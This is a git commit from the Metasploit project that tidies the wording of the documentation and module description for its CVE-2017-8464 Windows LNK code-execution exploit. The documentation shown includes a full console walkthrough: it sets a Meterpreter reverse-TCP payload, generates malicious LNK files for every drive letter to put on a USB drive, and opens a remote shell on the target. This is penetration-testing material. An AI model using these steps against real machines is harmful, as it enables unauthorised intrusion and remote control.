update some documentation

2017-08-03 17:09:44 -05:00 · 2017-08-03 17:09:44 -05:00 · da3ca9eb90
parent 81500f7336
commit da3ca9eb90
2 changed files with 16 additions and 14 deletions
--- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md
+++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md
@ -1,10 +1,13 @@
 ## Vulnerable Application

-Any Windows versions without the patch for CVE-2017-8464. The exploit doesn't appear to work with UNC drives. Because of this the DLL file needs to be on the local file system or an USB drive. A fix was released on June 2017 Patch Tuesday.
+This vulnerability affects any Windows version without the patch for
+CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of
+this, the exploit DLL file needs to be on a local file system or an USB drive.
+A fix was released in the June 2017 Patch Tuesday.

 ## Vulnerable Setup

-To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, make sure that MS10-046 & MS15-020 are installed.
+To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.

 ## Verification Steps

@ -26,25 +29,25 @@ To set up the vulnerable environment, install a Windows version without the patc

  1. `cp /root/.msf4/local/* [USB drive path]`
  2. Insert device in target machine and browse to it
-  
+
 ## Options

 **FILENAME**

-The file name of the LNK file. This file name can be renamed in a letter stage. If not set, a random name will be generated.
+The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.

 **DLLNAME**

-The file name of the DLL file. This file name cannot be renamed as this will invalidate the LNK file(s). If not set, a random name will be generated.
+The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.

 **DRIVE**

-Drive letter assigned to USB drive on victim's machine. If not set LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to make it more likely that the vulnerability is triggered.
+Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.

 ### Windows 10 x64 (Build 14393)

 ```
-msf > use exploit/multi/handler 
+msf > use exploit/multi/handler
 msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 msf exploit(handler) > set LHOST 192.168.146.197
@ -52,10 +55,10 @@ LHOST => 192.168.146.197
 msf exploit(handler) > exploit -j
 [*] Exploit running as background job.

-[*] Started reverse TCP handler on 192.168.146.197:4444 
+[*] Started reverse TCP handler on 192.168.146.197:4444
 [*] Starting the payload handler...
 msf exploit(handler) > back
-msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 
+msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
 msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
@ -88,7 +91,7 @@ msf exploit(cve_2017_8464_lnk_rce) > exploit
 [*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
 [*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
 [*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
-msf exploit(cve_2017_8464_lnk_rce) > 
+msf exploit(cve_2017_8464_lnk_rce) >
 [*] Sending stage (1189423 bytes) to 192.168.146.193
 [*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
 sessions -i 1
@ -102,5 +105,5 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x64/windows
-meterpreter > 
+meterpreter >
 ```
--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@ -17,8 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
        info,
        'Name'            => 'LNK Code Execution Vulnerability',
        'Description'     => %q{
-          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
-          that contain a dynamic icon, loaded from a malicious DLL.
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.

          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
          similar except an additional SpecialFolderDataBlock is included. The folder ID set
@ -57,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
          ],
-        'DefaultTarget' => 0, # Default target is 64-bit
+        'DefaultTarget' => 0, # Default target is Automatic
        'DisclosureDate' => 'Jun 13 2017'
      )
    )